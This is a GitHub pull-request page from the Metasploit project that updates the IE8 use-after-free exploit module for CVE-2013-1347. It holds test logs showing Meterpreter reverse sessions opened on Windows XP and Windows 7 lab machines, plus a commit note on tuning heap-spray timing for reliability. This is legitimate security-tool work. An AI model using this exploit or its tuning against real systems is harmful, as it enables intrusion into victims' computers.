
Update for CVE-2013-1347 #1809

Merged (3 commits, May 8, 2013)

Conversation

@wchen-r7 (Contributor) commented May 8, 2013

This mainly updates the RopDb usage and mstime_malloc usage.

@jvazquez-r7 (Contributor) commented:

  • Tested on WXPSP3
msf exploit(ie_cgenericelement_uaf) > [*] 10.6.0.165       ie_cgenericelement_uaf - Requesting: /A84yOZCxf7SH
[*] 10.6.0.165       ie_cgenericelement_uaf - Target selected as: IE 8 on Windows XP SP3
[*] 10.6.0.165       ie_cgenericelement_uaf - Sending HTML...
[*] Sending stage (751104 bytes) to 10.6.0.165
[*] Sending stage (751104 bytes) to 10.6.0.165

msf exploit(ie_cgenericelement_uaf) > 
[*] 10.6.0.165       ie_cgenericelement_uaf - Requesting: /A84yOZCxf7SH
[*] 10.6.0.165       ie_cgenericelement_uaf - Target selected as: IE 8 on Windows XP SP3
[*] 10.6.0.165       ie_cgenericelement_uaf - Sending HTML...
[*] Sending stage (751104 bytes) to 10.6.0.165
[*] Meterpreter session 1 opened (10.6.0.165:4444 -> 10.6.0.165:57420) at 2013-05-08 16:13:20 -0500
[*] Session ID 1 (10.6.0.165:4444 -> 10.6.0.165:57420) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (4020)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3944

msf exploit(ie_cgenericelement_uaf) > sessions -i 1[+] Successfully migrated to process 

[*] Starting interaction with 1...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

  • Tested on W7SP1
[*] 10.6.0.165       ie_cgenericelement_uaf - Requesting: /A84yOZCxf7SH
[*] 10.6.0.165       ie_cgenericelement_uaf - Target selected as: IE 8 on Windows 7
[*] 10.6.0.165       ie_cgenericelement_uaf - Sending HTML...
[*] Sending stage (751104 bytes) to 10.6.0.165
[*] Sending stage (751104 bytes) to 10.6.0.165
[*] Meterpreter session 2 opened (10.6.0.165:4444 -> 10.6.0.165:57738) at 2013-05-08 16:18:33 -0500
[*] Session ID 2 (10.6.0.165:4444 -> 10.6.0.165:57738) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3052)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3004

msf exploit(ie_cgenericelement_uaf) > sessio[+] Successfully migrated to process 
ns -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.187 - Meterpreter session 2 closed.  Reason: User exit

msftidy is happy too. Merging!

@jvazquez-r7 jvazquez-r7 merged commit 9a1400a into rapid7:master May 8, 2013
wchen-r7 added a commit to wchen-r7/metasploit-framework that referenced this pull request May 9, 2013
While updating ie_cgenericelement_uaf earlier today, I noticed the
changes made it a tiny bit less stable. Juan's test log in rapid7#1809
also kinda shows that (with the first attempt failing), so I decided
to go back and move the string crafting part; that way, between
CollectGarbage() and the overwrite, there is less noise, and hopefully
it is more stable. I did a few tests; it seems better.
dougsko pushed a commit to dougsko/metasploit-framework that referenced this pull request Jun 20, 2013 (same commit message as above).
@wchen-r7 wchen-r7 deleted the cve_2013_1347_update_1 branch August 22, 2016 16:23